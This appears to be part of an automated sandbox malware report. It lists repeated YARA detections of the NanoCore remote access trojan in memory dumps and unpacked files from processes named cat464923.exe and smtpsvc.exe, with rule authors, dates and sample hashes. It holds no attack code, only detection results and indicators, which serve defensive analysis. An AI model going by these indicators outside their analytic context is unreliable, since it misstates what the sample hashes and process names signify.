Source: 00000010.00000000.2147864826.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000010.00000000.2147864826.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000011.00000000.2148426464.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000011.00000000.2148426464.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000000D.00000002.2212398437.0000000003379000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000D.00000002.2212398437.0000000003379000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000010.00000002.2220405288.0000000002281000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000004.00000002.2090874176.00000000033D9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000004.00000002.2090874176.00000000033D9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000010.00000002.2220469007.0000000003289000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000011.00000002.2221628087.0000000002301000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000012.00000002.2220153845.0000000002351000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000005.00000000.2088546622.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000005.00000000.2088546622.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000012.00000000.2168272542.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000012.00000000.2168272542.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000000C.00000002.2209068863.00000000030A9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000C.00000002.2209068863.00000000030A9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000012.00000000.2169977777.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000012.00000000.2169977777.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000005.00000002.2347409859.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000005.00000002.2347409859.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000000B.00000002.2212832493.0000000003239000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000B.00000002.2212832493.0000000003239000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000000C.00000002.2210122241.0000000003255000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000C.00000002.2210122241.0000000003255000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: Process Memory Space: smtpsvc.exe PID: 2416, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: Process Memory Space: smtpsvc.exe PID: 2416, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: Process Memory Space: cat464923.exe PID: 2468, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: Process Memory Space: cat464923.exe PID: 2468, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: Process Memory Space: cat464923.exe PID: 2324, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: Process Memory Space: cat464923.exe PID: 2324, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: Process Memory Space: cat464923.exe PID: 2668, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: Process Memory Space: cat464923.exe PID: 2668, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 17.0.smtpsvc.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 17.0.smtpsvc.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 17.0.smtpsvc.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 17.0.smtpsvc.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 17.0.smtpsvc.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 17.0.smtpsvc.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 17.2.smtpsvc.exe.2324e04.3.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 17.2.smtpsvc.exe.2324e04.3.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 18.0.smtpsvc.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 18.0.smtpsvc.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 18.0.smtpsvc.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 5.2.cat464923.exe.34e019c.10.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.2.cat464923.exe.34e019c.10.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 5.2.cat464923.exe.4a0000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.2.cat464923.exe.4a0000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 18.2.smtpsvc.exe.339b366.6.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 18.2.smtpsvc.exe.339b366.6.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 18.2.smtpsvc.exe.339b366.6.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 13.2.smtpsvc.exe.3444d80.6.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 13.2.smtpsvc.exe.3444d80.6.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 13.2.smtpsvc.exe.3444d80.6.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 5.2.cat464923.exe.34db366.8.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.2.cat464923.exe.34db366.8.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 5.2.cat464923.exe.34db366.8.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 16.2.cat464923.exe.32d019c.5.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 16.2.cat464923.exe.32d019c.5.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 16.2.cat464923.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 16.2.cat464923.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 16.2.cat464923.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 5.2.cat464923.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.2.cat464923.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 5.2.cat464923.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 17.2.smtpsvc.exe.334b366.5.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 17.2.smtpsvc.exe.334b366.5.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 17.2.smtpsvc.exe.334b366.5.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 18.2.smtpsvc.exe.33a019c.5.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 18.2.smtpsvc.exe.33a019c.5.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 5.2.cat464923.exe.440000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.2.cat464923.exe.440000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 5.0.cat464923.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.0.cat464923.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 5.0.cat464923.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 17.2.smtpsvc.exe.33547c5.4.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 17.2.smtpsvc.exe.33547c5.4.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 5.2.cat464923.exe.34e47c5.9.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.2.cat464923.exe.34e47c5.9.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 16.0.cat464923.exe.400000.3.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 16.0.cat464923.exe.400000.3.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 16.0.cat464923.exe.400000.3.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 16.0.cat464923.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 16.0.cat464923.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 16.0.cat464923.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
